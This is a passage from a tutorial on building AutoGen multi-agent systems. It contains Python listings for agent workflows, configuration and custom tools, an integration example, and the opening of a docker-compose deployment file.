218 for message in reversed(user_proxy.chat_history):
219 if message["role"] == "assistant" and message.get("name") == "ReasoningAgent":
220 solution = message["content"]
221 break
222
223 # Step 3: Critic evaluates the solution
224 user_proxy.initiate_chat(
225 critic_agent,
226 message=f"Critically evaluate this solution to the problem: {problem}\n\nSolution: {solution}\n\nIdentify any flaws, weaknesses, or areas for improvement."
227 )
228
229 # Extract critique from the last message
230 critique = None
231 for message in reversed(user_proxy.chat_history):
232 if message["role"] == "assistant" and message.get("name") == "CriticAgent":
233 critique = message["content"]
234 break
235
236 # Return the complete workflow results
237 return {
238 "problem": problem,
239 "research": research_results,
240 "solution": solution,
241 "critique": critique,
242 "chat_history": user_proxy.chat_history
243 }
244
245 def _execute_groupchat(self, user_proxy, manager, problem):
246 """Execute a group chat discussion to solve a problem."""
247 # Start the group chat with the problem statement
248 prompt = f"""
249 Problem to solve: {problem}
250
251 Please work together to solve this problem effectively. The ProjectManager should coordinate the process:
252
253 1. Start by understanding and breaking down the problem
254 2. The ResearchAgent should gather relevant information
255 3. The ReasoningAgent should analyze the information and develop a solution approach
256 4. The CreativeAgent should propose innovative perspectives or approaches
257 5. The CriticAgent should evaluate the proposed solution and suggest improvements
258 6. Finalize a comprehensive solution addressing all aspects of the problem
259
260 Each agent should contribute based on their expertise. The final solution should be comprehensive, accurate, and well-reasoned.
261 """
262
263 user_proxy.initiate_chat(manager, message=prompt)
264
265 # Extract the final solution from the chat history
266 # (In a real implementation, you might want to look for a specific concluding message)
267 solution_message = None
268 for message in reversed(user_proxy.chat_history):
269 # Look for a substantial message summarizing the solution
270 if message["role"] == "assistant" and len(message["content"]) > 500:
271 solution_message = message
272 break
273
274 solution = solution_message["content"] if solution_message else "No clear solution was reached."
275
276 return {
277 "problem": problem,
278 "solution": solution,
279 "chat_history": user_proxy.chat_history
280 }
281
282 def _execute_hierarchical_team(self, user_proxy, team, problem):
283 """Execute a hierarchical team workflow with a manager coordinating specialists."""
284 # Step 1: Manager creates a plan
285 user_proxy.initiate_chat(
286 team["manager"],
287 message=f"We need to solve this problem: {problem}\n\nPlease create a detailed plan breaking this down into steps, indicating which specialist should handle each step: Research, Reasoning, Coding, Creativity, or Critique."
288 )
289
290 # Extract the plan from the last message
291 plan = None
292 for message in reversed(user_proxy.chat_history):
293 if message["role"] == "assistant" and message.get("name") == "ProjectManager":
294 plan = message["content"]
295 break
296
297 # Step 2: Execute the plan by working with specialists in sequence
298 results = {"plan": plan, "specialist_outputs": {}}
299
300 # This is a simplified version - in a real implementation, you would parse the plan
301 # and dynamically determine which specialists to call in which order
302 specialists_sequence = [
303 ("research", "Please research this problem and provide relevant information and context: " + problem),
304 ("reasoning", "Based on our research, please analyze this problem and outline a solution approach: " + problem),
305 ("coding", "Please implement the technical aspects of our solution approach to this problem: " + problem),
306 ("creativity", "Please review our current approach and suggest any creative improvements or alternative perspectives: " + problem),
307 ("critique", "Please review our complete solution and identify any issues or areas for improvement: " + problem)
308 ]
309
310 for specialist_key, message_text in specialists_sequence:
311 specialist = team["specialists"][specialist_key]
312
313 user_proxy.initiate_chat(
314 specialist,
315 message=message_text
316 )
317
318 # Extract specialist output
319 specialist_output = None
320 for message in reversed(user_proxy.chat_history):
321 if message["role"] == "assistant" and message.get("name") == specialist.name:
322 specialist_output = message["content"]
323 break
324
325 results["specialist_outputs"][specialist_key] = specialist_output
326
327 # Step 3: Manager integrates all outputs into a final solution
328 integration_message = f"""
329 Now that all specialists have contributed, please integrate their work into a cohesive final solution to the original problem.
330
331 Original problem: {problem}
332
333 Specialist contributions:
334 {json.dumps(results['specialist_outputs'], indent=2)}
335
336 Please provide a comprehensive final solution that incorporates all relevant specialist input.
337 """
338
339 user_proxy.initiate_chat(team["manager"], message=integration_message)
340
341 # Extract the final solution
342 final_solution = None
343 for message in reversed(user_proxy.chat_history):
344 if message["role"] == "assistant" and message.get("name") == "ProjectManager":
345 final_solution = message["content"]
346 break
347
348 results["final_solution"] = final_solution
349 results["chat_history"] = user_proxy.chat_history
350
351 return results
352
353 def _execute_competitive_evaluation(self, user_proxy, solution_agents, judge_agent, problem):
354 """Execute a competitive process where multiple agents propose solutions and a judge evaluates them."""
355 # Step 1: Each solution agent develops their own approach
356 solutions = {}
357
358 for agent in solution_agents:
359 user_proxy.initiate_chat(
360 agent,
361 message=f"Please solve this problem using your unique approach and expertise: {problem}\n\nProvide a comprehensive solution."
362 )
363
364 # Extract solution
365 solution = None
366 for message in reversed(user_proxy.chat_history):
367 if message["role"] == "assistant" and message.get("name") == agent.name:
368 solution = message["content"]
369 break
370
371 solutions[agent.name] = solution
372
373 # Step 2: Judge evaluates all solutions
374 evaluation_request = f"""
375 Please evaluate the following solutions to this problem:
376
377 Problem: {problem}
378
379 {'-' * 40}
380
381 """
382
383 for agent_name, solution in solutions.items():
384 evaluation_request += f"{agent_name}'s Solution:\n{solution}\n\n{'-' * 40}\n\n"
385
386 evaluation_request += """
387 Please evaluate each solution based on the following criteria:
388 1. Accuracy and correctness
389 2. Completeness (addresses all aspects of the problem)
390 3. Efficiency and elegance
391 4. Innovation and creativity
392 5. Practicality and feasibility
393
394 For each solution, provide a score from 1-10 on each criterion, along with a brief explanation.
395
396 Then select the best overall solution OR propose a hybrid approach that combines the strengths of multiple solutions.
397
398 Provide your detailed evaluation and final recommendation.
399 """
400
401 user_proxy.initiate_chat(judge_agent, message=evaluation_request)
402
403 # Extract evaluation
404 evaluation = None
405 for message in reversed(user_proxy.chat_history):
406 if message["role"] == "assistant" and message.get("name") == "JudgeAgent":
407 evaluation = message["content"]
408 break
409
410 return {
411 "problem": problem,
412 "solutions": solutions,
413 "evaluation": evaluation,
414 "chat_history": user_proxy.chat_history
415 }

3. Configuring Advanced AutoGen Features

python
1# agent_framework/advanced_config.py
2import os
3import json
4import logging
5from typing import Dict, List, Any, Optional
6
7class AutoGenConfig:
8 """Configuration manager for AutoGen multi-agent systems."""
9
10 def __init__(self, config_path: Optional[str] = None):
11 """
12 Initialize AutoGen configuration.
13
14 Args:
15 config_path: Optional path to a JSON configuration file
16 """
17 self.logger = logging.getLogger("autogen_config")
18
19 # Default configuration
20 self.config = {
21 "llm": {
22 "config_list": [
23 {
24 "model": "gpt-4-turbo",
25 "api_key": os.environ.get("OPENAI_API_KEY", "")
26 }
27 ],
28 "temperature": 0.7,
29 "request_timeout": 300,
30 "max_tokens": 4000,
31 "seed": None
32 },
33 "agents": {
34 "termination": {
35 "max_turns": 30,
36 "terminate_on_keywords": ["FINAL ANSWER", "TASK COMPLETE"],
37 "max_consecutive_auto_reply": 10
38 },
39 "user_proxy": {
40 "human_input_mode": "NEVER",
41 "code_execution_config": {
42 "work_dir": "workspace",
43 "use_docker": False
44 }
45 }
46 },
47 "logging": {
48 "level": "INFO",
49 "log_file": "autogen.log"
50 },
51 "caching": {
52 "enabled": True,
53 "cache_path": ".cache/autogen",
54 "cache_seed": 42
55 }
56 }
57
58 # Load configuration from file if provided
59 if config_path and os.path.exists(config_path):
60 self._load_config(config_path)
61
62 # Setup logging
63 self._setup_logging()
64
65 def _load_config(self, config_path: str):
66 """Load configuration from JSON file."""
67 try:
68 with open(config_path, 'r') as f:
69 file_config = json.load(f)
70
71 # Update config with file values (deep merge)
72 self._deep_update(self.config, file_config)
73 self.logger.info(f"Loaded configuration from {config_path}")
74 except Exception as e:
75 self.logger.error(f"Error loading configuration from {config_path}: {str(e)}")
76
77 def _deep_update(self, d: Dict, u: Dict):
78 """Recursively update a dictionary."""
79 for k, v in u.items():
80 if isinstance(v, dict) and k in d and isinstance(d[k], dict):
81 self._deep_update(d[k], v)
82 else:
83 d[k] = v
84
85 def _setup_logging(self):
86 """Configure logging based on settings."""
87 log_level = getattr(logging, self.config["logging"]["level"], logging.INFO)
88
89 logging.basicConfig(
90 level=log_level,
91 format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
92 handlers=[
93 logging.StreamHandler(),
94 logging.FileHandler(self.config["logging"]["log_file"])
95 ]
96 )
97
98 def get_llm_config(self, agent_type: Optional[str] = None) -> Dict[str, Any]:
99 """
100 Get LLM configuration, optionally customized for a specific agent type.
101
102 Args:
103 agent_type: Optional agent type for specific configurations
104
105 Returns:
106 Dictionary with LLM configuration
107 """
108 base_config = {
109 "config_list": self.config["llm"]["config_list"],
110 "temperature": self.config["llm"]["temperature"],
111 "request_timeout": self.config["llm"]["request_timeout"],
112 "max_tokens": self.config["llm"]["max_tokens"]
113 }
114
115 # Add caching if enabled
116 if self.config["caching"]["enabled"]:
117 base_config["cache_seed"] = self.config["caching"]["cache_seed"]
118
119 # Apply agent-specific customizations if needed
120 if agent_type == "coding":
121 base_config["temperature"] = min(base_config["temperature"], 0.3)
122 elif agent_type == "creative":
123 base_config["temperature"] = max(base_config["temperature"], 0.8)
124
125 return base_config
126
127 def get_termination_config(self) -> Dict[str, Any]:
128 """Get termination configuration for conversations."""
129 return self.config["agents"]["termination"]
130
131 def get_user_proxy_config(self) -> Dict[str, Any]:
132 """Get user proxy agent configuration."""
133 return self.config["agents"]["user_proxy"]
134
135 def get_work_dir(self) -> str:
136 """Get the working directory for code execution."""
137 return self.config["agents"]["user_proxy"]["code_execution_config"]["work_dir"]
138
139 def save_config(self, config_path: str):
140 """Save current configuration to a file."""
141 try:
142 os.makedirs(os.path.dirname(config_path), exist_ok=True)
143 with open(config_path, 'w') as f:
144 json.dump(self.config, f, indent=2)
145 self.logger.info(f"Saved configuration to {config_path}")
146 except Exception as e:
147 self.logger.error(f"Error saving configuration to {config_path}: {str(e)}")

4. Using Custom Tools with AutoGen

python
1# agent_framework/custom_tools.py
2import os
3import json
4import time
5import logging
6import requests
7from typing import Dict, List, Any, Optional, Callable
8from concurrent.futures import ThreadPoolExecutor
9
10# Set up logging
11logger = logging.getLogger("agent_tools")
12
13class VectorDBTool:
14 """Tool for interacting with vector databases for knowledge retrieval."""
15
16 def __init__(self, api_key: str, api_url: str, embedding_model: str = "text-embedding-ada-002"):
17 """
18 Initialize the vector database tool.
19
20 Args:
21 api_key: API key for the vector database
22 api_url: Base URL for the vector database API
23 embedding_model: Model to use for embeddings
24 """
25 self.api_key = api_key
26 self.api_url = api_url.rstrip('/')
27 self.embedding_model = embedding_model
28 self.headers = {
29 "Content-Type": "application/json",
30 "Authorization": f"Bearer {api_key}"
31 }
32
33 def search_knowledge_base(self, query: str, collection_name: str, limit: int = 5) -> List[Dict[str, Any]]:
34 """
35 Search the knowledge base for relevant documents.
36
37 Args:
38 query: The search query
39 collection_name: Name of the collection to search
40 limit: Maximum number of results to return
41
42 Returns:
43 List of relevant documents with their content and metadata
44 """
45 try:
46 response = requests.post(
47 f"{self.api_url}/search",
48 headers=self.headers,
49 json={
50 "query": query,
51 "collection_name": collection_name,
52 "limit": limit
53 },
54 timeout=30
55 )
56
57 response.raise_for_status()
58 results = response.json().get("results", [])
59
60 logger.info(f"Found {len(results)} documents matching query in collection {collection_name}")
61 return results
62
63 except Exception as e:
64 logger.error(f"Error searching knowledge base: {str(e)}")
65 return [{"error": str(e), "query": query}]
66
67 def add_document(self, text: str, metadata: Dict[str, Any], collection_name: str) -> Dict[str, Any]:
68 """
69 Add a document to the knowledge base.
70
71 Args:
72 text: Document text
73 metadata: Document metadata
74 collection_name: Collection to add the document to
75
76 Returns:
77 Response with document ID and status
78 """
79 try:
80 response = requests.post(
81 f"{self.api_url}/documents",
82 headers=self.headers,
83 json={
84 "text": text,
85 "metadata": metadata,
86 "collection_name": collection_name
87 },
88 timeout=30
89 )
90
91 response.raise_for_status()
92 result = response.json()
93
94 logger.info(f"Added document {result.get('id')} to collection {collection_name}")
95 return result
96
97 except Exception as e:
98 logger.error(f"Error adding document to knowledge base: {str(e)}")
99 return {"error": str(e), "status": "failed"}
100
101
102class WebSearchTool:
103 """Tool for performing web searches and retrieving information."""
104
105 def __init__(self, api_key: str, search_engine: str = "bing"):
106 """
107 Initialize the web search tool.
108
109 Args:
110 api_key: API key for the search service
111 search_engine: Search engine to use (bing, google, etc.)
112 """
113 self.api_key = api_key
114 self.search_engine = search_engine
115
116 # Configure the appropriate API URL based on search engine
117 if search_engine.lower() == "bing":
118 self.api_url = "https://api.bing.microsoft.com/v7.0/search"
119 self.headers = {
120 "Ocp-Apim-Subscription-Key": api_key
121 }
122 elif search_engine.lower() == "google":
123 self.api_url = "https://www.googleapis.com/customsearch/v1"
124 # No headers for Google, API key is passed as a parameter
125 self.headers = {}
126 else:
127 raise ValueError(f"Unsupported search engine: {search_engine}")
128
129 def search(self, query: str, limit: int = 5) -> List[Dict[str, Any]]:
130 """
131 Perform a web search.
132
133 Args:
134 query: Search query
135 limit: Maximum number of results to return
136
137 Returns:
138 List of search results with title, snippet, and URL
139 """
140 try:
141 if self.search_engine.lower() == "bing":
142 params = {
143 "q": query,
144 "count": limit,
145 "responseFilter": "Webpages",
146 "textFormat": "Raw"
147 }
148 response = requests.get(
149 self.api_url,
150 headers=self.headers,
151 params=params,
152 timeout=30
153 )
154
155 response.raise_for_status()
156 results = response.json().get("webPages", {}).get("value", [])
157
158 return [
159 {
160 "title": result.get("name", ""),
161 "snippet": result.get("snippet", ""),
162 "url": result.get("url", "")
163 }
164 for result in results
165 ]
166
167 elif self.search_engine.lower() == "google":
168 params = {
169 "key": self.api_key,
170 "cx": "YOUR_CUSTOM_SEARCH_ENGINE_ID", # Replace with your actual search engine ID
171 "q": query,
172 "num": limit
173 }
174 response = requests.get(
175 self.api_url,
176 params=params,
177 timeout=30
178 )
179
180 response.raise_for_status()
181 results = response.json().get("items", [])
182
183 return [
184 {
185 "title": result.get("title", ""),
186 "snippet": result.get("snippet", ""),
187 "url": result.get("link", "")
188 }
189 for result in results
190 ]
191
192 logger.info(f"Performed web search for '{query}' with {len(results)} results")
193 return results
194
195 except Exception as e:
196 logger.error(f"Error performing web search: {str(e)}")
197 return [{"error": str(e), "query": query}]
198
199
200class DataAnalysisTool:
201 """Tool for analyzing data and generating visualizations."""
202
203 def __init__(self, work_dir: str = "data_analysis"):
204 """
205 Initialize the data analysis tool.
206
207 Args:
208 work_dir: Working directory for saving analysis outputs
209 """
210 self.work_dir = work_dir
211 os.makedirs(work_dir, exist_ok=True)
212
213 def analyze_data(self, data_json: str, analysis_type: str) -> Dict[str, Any]:
214 """
215 Analyze data and generate statistics.
216
217 Args:
218 data_json: JSON string containing data to analyze
219 analysis_type: Type of analysis to perform (descriptive, correlation, etc.)
220
221 Returns:
222 Dictionary with analysis results
223 """
224 try:
225 import pandas as pd
226 import numpy as np
227
228 # Parse the data
229 try:
230 # Try parsing as JSON
231 data = json.loads(data_json)
232 df = pd.DataFrame(data)
233 except:
234 # If not valid JSON, try parsing as CSV
235 import io
236 df = pd.read_csv(io.StringIO(data_json))
237
238 results = {"analysis_type": analysis_type, "columns": list(df.columns)}
239
240 # Perform the specified analysis
241 if analysis_type == "descriptive":
242 results["descriptive_stats"] = json.loads(df.describe().to_json())
243 results["missing_values"] = df.isnull().sum().to_dict()
244 results["data_types"] = {col: str(dtype) for col, dtype in df.dtypes.items()}
245
246 elif analysis_type == "correlation":
247 # Calculate correlations for numeric columns
248 numeric_df = df.select_dtypes(include=[np.number])
249 if not numeric_df.empty:
250 correlations = numeric_df.corr().to_dict()
251 results["correlations"] = correlations
252 else:
253 results["correlations"] = {}
254 results["warning"] = "No numeric columns available for correlation analysis"
255
256 elif analysis_type == "timeseries":
257 # Check if there's a date/time column
258 date_cols = [col for col in df.columns if df[col].dtype == 'datetime64[ns]' or
259 'date' in col.lower() or 'time' in col.lower()]
260
261 if date_cols:
262 date_col = date_cols[0]
263 if df[date_col].dtype != 'datetime64[ns]':
264 df[date_col] = pd.to_datetime(df[date_col], errors='coerce')
265
266 df = df.sort_values(by=date_col)
267 df.set_index(date_col, inplace=True)
268
269 # Get basic time series statistics
270 numeric_cols = df.select_dtypes(include=[np.number]).columns
271 results["timeseries_stats"] = {}
272
273 for col in numeric_cols:
274 col_stats = {}
275 # Calculate trends
276 col_stats["trend"] = "increasing" if df[col].iloc[-1] > df[col].iloc[0] else "decreasing"
277 col_stats["min"] = float(df[col].min())
278 col_stats["max"] = float(df[col].max())
279 col_stats["start_value"] = float(df[col].iloc[0])
280 col_stats["end_value"] = float(df[col].iloc[-1])
281 col_stats["percent_change"] = float((df[col].iloc[-1] - df[col].iloc[0]) / df[col].iloc[0] * 100 if df[col].iloc[0] != 0 else 0)
282
283 results["timeseries_stats"][col] = col_stats
284 else:
285 results["warning"] = "No date/time columns identified for time series analysis"
286
287 logger.info(f"Completed {analysis_type} analysis on data with {len(df)} rows")
288 return results
289
290 except Exception as e:
291 logger.error(f"Error analyzing data: {str(e)}")
292 return {"error": str(e), "analysis_type": analysis_type}
293
294 def generate_visualization(self, data_json: str, viz_type: str, params: Dict[str, Any]) -> Dict[str, Any]:
295 """
296 Generate a visualization from data.
297
298 Args:
299 data_json: JSON string containing data to visualize
300 viz_type: Type of visualization (bar, line, scatter, etc.)
301 params: Additional parameters for the visualization
302
303 Returns:
304 Dictionary with path to visualization and metadata
305 """
306 try:
307 import pandas as pd
308 import matplotlib.pyplot as plt
309 import seaborn as sns
310 from matplotlib.figure import Figure
311
312 # Set the style
313 plt.style.use('ggplot')
314
315 # Parse the data
316 try:
317 # Try parsing as JSON
318 data = json.loads(data_json)
319 df = pd.DataFrame(data)
320 except:
321 # If not valid JSON, try parsing as CSV
322 import io
323 df = pd.read_csv(io.StringIO(data_json))
324
325 # Extract parameters
326 x_column = params.get('x')
327 y_column = params.get('y')
328 title = params.get('title', f'{viz_type.capitalize()} Chart')
329 xlabel = params.get('xlabel', x_column)
330 ylabel = params.get('ylabel', y_column)
331 figsize = params.get('figsize', (10, 6))
332
333 # Create the figure
334 fig = Figure(figsize=figsize)
335 ax = fig.subplots()
336
337 # Generate the specified visualization
338 if viz_type == "bar":
339 sns.barplot(x=x_column, y=y_column, data=df, ax=ax)
340
341 elif viz_type == "line":
342 sns.lineplot(x=x_column, y=y_column, data=df, ax=ax)
343
344 elif viz_type == "scatter":
345 hue = params.get('hue')
346 if hue:
347 sns.scatterplot(x=x_column, y=y_column, hue=hue, data=df, ax=ax)
348 else:
349 sns.scatterplot(x=x_column, y=y_column, data=df, ax=ax)
350
351 elif viz_type == "histogram":
352 bins = params.get('bins', 10)
353 sns.histplot(df[x_column], bins=bins, ax=ax)
354
355 elif viz_type == "heatmap":
356 # For heatmap, we need a pivot table or correlation matrix
357 corr = df.corr()
358 sns.heatmap(corr, annot=True, cmap='coolwarm', ax=ax)
359
360 else:
361 raise ValueError(f"Unsupported visualization type: {viz_type}")
362
363 # Set labels and title
364 ax.set_title(title)
365 ax.set_xlabel(xlabel)
366 ax.set_ylabel(ylabel)
367
368 # Save the figure
369 timestamp = int(time.time())
370 filename = f"{viz_type}_{timestamp}.png"
371 filepath = os.path.join(self.work_dir, filename)
372 fig.savefig(filepath, dpi=100, bbox_inches='tight')
373
374 logger.info(f"Generated {viz_type} visualization and saved to {filepath}")
375
376 return {
377 "visualization_type": viz_type,
378 "filepath": filepath,
379 "title": title,
380 "dimensions": {
381 "x": x_column,
382 "y": y_column
383 },
384 "data_shape": {
385 "rows": len(df),
386 "columns": len(df.columns)
387 }
388 }
389
390 except Exception as e:
391 logger.error(f"Error generating visualization: {str(e)}")
392 return {"error": str(e), "visualization_type": viz_type}
393
394
395class APIIntegrationTool:
396 """Tool for interacting with external APIs."""
397
398 def __init__(self, api_configs: Dict[str, Dict[str, Any]]):
399 """
400 Initialize the API integration tool.
401
402 Args:
403 api_configs: Dictionary mapping API names to their configurations
404 """
405 self.api_configs = api_configs
406 self.session = requests.Session()
407
408 def call_api(self, api_name: str, endpoint: str, method: str = "GET",
409 params: Optional[Dict[str, Any]] = None,
410 data: Optional[Dict[str, Any]] = None,
411 headers: Optional[Dict[str, str]] = None) -> Dict[str, Any]:
412 """
413 Call an external API.
414
415 Args:
416 api_name: Name of the API (must be configured)
417 endpoint: API endpoint to call
418 method: HTTP method (GET, POST, etc.)
419 params: Query parameters
420 data: Request body for POST/PUT
421 headers: Additional headers
422
423 Returns:
424 API response
425 """
426 if api_name not in self.api_configs:
427 return {"error": f"API '{api_name}' not configured"}
428
429 config = self.api_configs[api_name]
430 base_url = config.get("base_url", "").rstrip('/')
431
432 # Combine base headers with request-specific headers
433 all_headers = config.get("headers", {}).copy()
434 if headers:
435 all_headers.update(headers)
436
437 url = f"{base_url}/{endpoint.lstrip('/')}"
438
439 try:
440 response = self.session.request(
441 method=method.upper(),
442 url=url,
443 params=params,
444 json=data,
445 headers=all_headers,
446 timeout=config.get("timeout", 30)
447 )
448
449 response.raise_for_status()
450
451 # Try to parse as JSON, fallback to text if not JSON
452 try:
453 result = response.json()
454 except:
455 result = {"text_response": response.text}
456
457 logger.info(f"Successfully called {api_name} API: {endpoint}")
458 return result
459
460 except Exception as e:
461 logger.error(f"Error calling {api_name} API: {str(e)}")
462 return {
463 "error": str(e),
464 "api_name": api_name,
465 "endpoint": endpoint,
466 "status_code": getattr(e, 'response', {}).status_code if hasattr(e, 'response') else None
467 }
468
469
470# Integration with AutoGen - Function mapping for tools
471
472def register_tools_with_agent(agent, tools_config: Dict[str, Any]) -> Dict[str, Callable]:
473 """
474 Register custom tools with an AutoGen agent.
475
476 Args:
477 agent: AutoGen agent
478 tools_config: Tool configuration dictionary
479
480 Returns:
481 Dictionary mapping function names to tool functions
482 """
483 function_map = {}
484
485 # Initialize vector database tool if configured
486 if "vector_db" in tools_config:
487 vector_db_config = tools_config["vector_db"]
488 vector_db_tool = VectorDBTool(
489 api_key=vector_db_config.get("api_key", ""),
490 api_url=vector_db_config.get("api_url", ""),
491 embedding_model=vector_db_config.get("embedding_model", "text-embedding-ada-002")
492 )
493
494 # Register vector database functions
495 function_map["search_knowledge_base"] = vector_db_tool.search_knowledge_base
496 function_map["add_document_to_knowledge_base"] = vector_db_tool.add_document
497
498 # Initialize web search tool if configured
499 if "web_search" in tools_config:
500 web_search_config = tools_config["web_search"]
501 web_search_tool = WebSearchTool(
502 api_key=web_search_config.get("api_key", ""),
503 search_engine=web_search_config.get("search_engine", "bing")
504 )
505
506 # Register web search functions
507 function_map["web_search"] = web_search_tool.search
508
509 # Initialize data analysis tool if configured
510 if "data_analysis" in tools_config:
511 data_analysis_config = tools_config["data_analysis"]
512 data_analysis_tool = DataAnalysisTool(
513 work_dir=data_analysis_config.get("work_dir", "data_analysis")
514 )
515
516 # Register data analysis functions
517 function_map["analyze_data"] = data_analysis_tool.analyze_data
518 function_map["generate_visualization"] = data_analysis_tool.generate_visualization
519
520 # Initialize API integration tool if configured
521 if "api_integration" in tools_config:
522 api_integration_config = tools_config["api_integration"]
523 api_integration_tool = APIIntegrationTool(
524 api_configs=api_integration_config.get("api_configs", {})
525 )
526
527 # Register API integration functions
528 function_map["call_api"] = api_integration_tool.call_api
529
530 return function_map

5. Integration Example: Bringing It All Together

python
1# app.py
2import os
3import json
4import logging
5from typing import Dict, List, Any, Optional
6
7import autogen
8from dotenv import load_dotenv
9
10from agent_framework.advanced_config import AutoGenConfig
11from agent_framework.specialized_agents import SpecializedAgentFactory
12from agent_framework.agent_groups import AgentGroupFactory
13from agent_framework.custom_tools import register_tools_with_agent
14
15# Load environment variables from .env file
16load_dotenv()
17
18# Initialize logging
19logging.basicConfig(
20 level=logging.INFO,
21 format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
22)
23logger = logging.getLogger(__name__)
24
25class AIAgentSystem:
26 """Main class for the AI Agent System."""
27
28 def __init__(self, config_path: Optional[str] = None):
29 """
30 Initialize the AI Agent System.
31
32 Args:
33 config_path: Optional path to configuration file
34 """
35 self.config = AutoGenConfig(config_path)
36
37 # Initialize the tool configurations
38 self.tools_config = {
39 "vector_db": {
40 "api_key": os.environ.get("VECTOR_DB_API_KEY", ""),
41 "api_url": os.environ.get("VECTOR_DB_API_URL", "https://api.yourvectordb.com/v1"),
42 "embedding_model": "text-embedding-ada-002"
43 },
44 "web_search": {
45 "api_key": os.environ.get("SEARCH_API_KEY", ""),
46 "search_engine": "bing"
47 },
48 "data_analysis": {
49 "work_dir": "data_analysis_workspace"
50 },
51 "api_integration": {
52 "api_configs": {
53 "weather": {
54 "base_url": "https://api.weatherapi.com/v1",
55 "headers": {
56 "key": os.environ.get("WEATHER_API_KEY", "")
57 },
58 "timeout": 10
59 },
60 "news": {
61 "base_url": "https://newsapi.org/v2",
62 "headers": {
63 "X-Api-Key": os.environ.get("NEWS_API_KEY", "")
64 },
65 "timeout": 10
66 }
67 }
68 }
69 }
70
71 # Create factories for building agents and groups
72 self.agent_factory = SpecializedAgentFactory(self.config.get_llm_config())
73 self.group_factory = AgentGroupFactory(self.config.get_llm_config())
74
75 # Track created groups for reuse
76 self.agent_groups = {}
77
78 def create_group_chat_agents(self, user_input: str = None) -> Dict[str, Any]:
79 """
80 Create a group chat with multiple specialized agents.
81
82 Args:
83 user_input: Optional initial user input
84
85 Returns:
86 Dictionary containing the group chat components
87 """
88 # Create a user proxy agent with tools
89 user_proxy = autogen.UserProxyAgent(
90 name="User",
91 human_input_mode="TERMINATE", # Allow human input when needed
92 max_consecutive_auto_reply=self.config.get_termination_config().get("max_consecutive_auto_reply", 10),
93 code_execution_config=self.config.get_user_proxy_config().get("code_execution_config")
94 )
95
96 # Create the group chat
97 group = self.group_factory.create_groupchat(user_proxy=user_proxy)
98
99 # Cache the group for later use
100 group_id = f"groupchat_{len(self.agent_groups) + 1}"
101 self.agent_groups[group_id] = group
102
103 # Return the group with its ID
104 return {
105 "group_id": group_id,
106 **group
107 }
108
109 def create_hierarchical_team(self, user_input: str = None) -> Dict[str, Any]:
110 """
111 Create a hierarchical team with a manager and specialists.
112
113 Args:
114 user_input: Optional initial user input
115
116 Returns:
117 Dictionary containing the team components
118 """
119 # Create a user proxy agent with tools
120 user_proxy = autogen.UserProxyAgent(
121 name="User",
122 human_input_mode="TERMINATE",
123 max_consecutive_auto_reply=self.config.get_termination_config().get("max_consecutive_auto_reply", 10),
124 code_execution_config=self.config.get_user_proxy_config().get("code_execution_config")
125 )
126
127 # Create the hierarchical team
128 team = self.group_factory.create_hierarchical_team(user_proxy=user_proxy)
129
130 # Register tools with each specialist agent
131 for name, agent in team["team"]["specialists"].items():
132 function_map = register_tools_with_agent(agent, self.tools_config)
133 if hasattr(agent, 'function_map'):
134 agent.function_map.update(function_map)
135 else:
136 # For newer AutoGen versions
137 agent.update_function_map(function_map)
138
139 # Cache the team for later use
140 team_id = f"team_{len(self.agent_groups) + 1}"
141 self.agent_groups[team_id] = team
142
143 # Return the team with its ID
144 return {
145 "team_id": team_id,
146 **team
147 }
148
149 def execute_agent_group(self, group_id: str, problem: str) -> Dict[str, Any]:
150 """
151 Execute an agent group on a problem.
152
153 Args:
154 group_id: ID of the agent group to use
155 problem: Problem to solve
156
157 Returns:
158 Results of the execution
159 """
160 if group_id not in self.agent_groups:
161 raise ValueError(f"Unknown group ID: {group_id}")
162
163 group = self.agent_groups[group_id]
164
165 # Execute the group on the problem
166 return group["execute"](problem)
167
168 def run_competitive_evaluation(self, problem: str) -> Dict[str, Any]:
169 """
170 Run a competitive evaluation where multiple agents solve a problem
171 and a judge evaluates their solutions.
172
173 Args:
174 problem: Problem to solve
175
176 Returns:
177 Evaluation results
178 """
179 # Create a user proxy agent with tools
180 user_proxy = autogen.UserProxyAgent(
181 name="User",
182 human_input_mode="NEVER",
183 max_consecutive_auto_reply=self.config.get_termination_config().get("max_consecutive_auto_reply", 10),
184 code_execution_config=self.config.get_user_proxy_config().get("code_execution_config")
185 )
186
187 # Create the competitive evaluation team
188 evaluation = self.group_factory.create_competitive_evaluation_team(user_proxy=user_proxy)
189
190 # Execute the evaluation
191 return evaluation["execute"](problem)
192
193# Example usage
194if __name__ == "__main__":
195 # Initialize the system
196 agent_system = AIAgentSystem()
197
198 # Create a hierarchical team
199 team = agent_system.create_hierarchical_team()
200 team_id = team["team_id"]
201
202 # Example problem to solve
203 problem = """
204 We need to analyze customer sentiment from our product reviews. The data is in a CSV format with the following columns:
205 - review_id: unique identifier for each review
206 - product_id: identifier for the product
207 - rating: numeric rating (1-5)
208 - review_text: the text of the review
209 - review_date: date when the review was posted
210
211 The goal is to:
212 1. Analyze the sentiment of each review
213 2. Identify common themes in positive and negative reviews
214 3. Track sentiment trends over time
215 4. Recommend actions based on the findings
216
217 The data can be found in this CSV: https://example.com/customer_reviews.csv (Note: this is a placeholder URL)
218 """
219
220 # Execute the team on the problem
221 results = agent_system.execute_agent_group(team_id, problem)
222
223 # Print the final solution
224 print("FINAL SOLUTION:")
225 print(results.get("final_solution", "No solution found"))

Deploying Your AI Agents with Docker, Kubernetes, or Cloud Hosting

Deploying AI agent systems at scale requires robust infrastructure. Here are detailed deployment approaches for different environments:

Docker Deployment

Create a docker-compose.yml for a comprehensive agent system:

yaml
1version: '3.8'
2
3services:
4 # API service for AI agents
5 agent-api:
6 build:
7 context: .
8 dockerfile: Dockerfile
9 ports:
10 - "8000:8000"
11 volumes:
12 - ./app:/app
13 - ./data:/data
14 environment:
15 - OPENAI_API_KEY=${OPENAI_API_KEY}
16 - PINECONE_API_KEY=${PINECONE_API_KEY}
17 - PINECONE_ENVIRONMENT=${PINECONE_ENVIRONMENT}
18 - DEBUG=False
19 - LOG_LEVEL=INFO
20 - DATABASE_URL=postgresql://postgres:postgres@postgres:5432/agent_db
21 depends_on:
22 - postgres
23 - redis
24 networks:
25 - agent-network
26 restart: unless-stopped
27 command: uvicorn app.main:app --host 0.0.0.0 --port 8000
28 healthcheck:
29 test: ["CMD", "curl", "-f", "http://localhost:8000/health"]
30 interval: 30s
31 timeout: 10s
32 retries: 3
33 start_period: 40s
34
35 # Celery worker for background tasks
36 worker:
37 build:
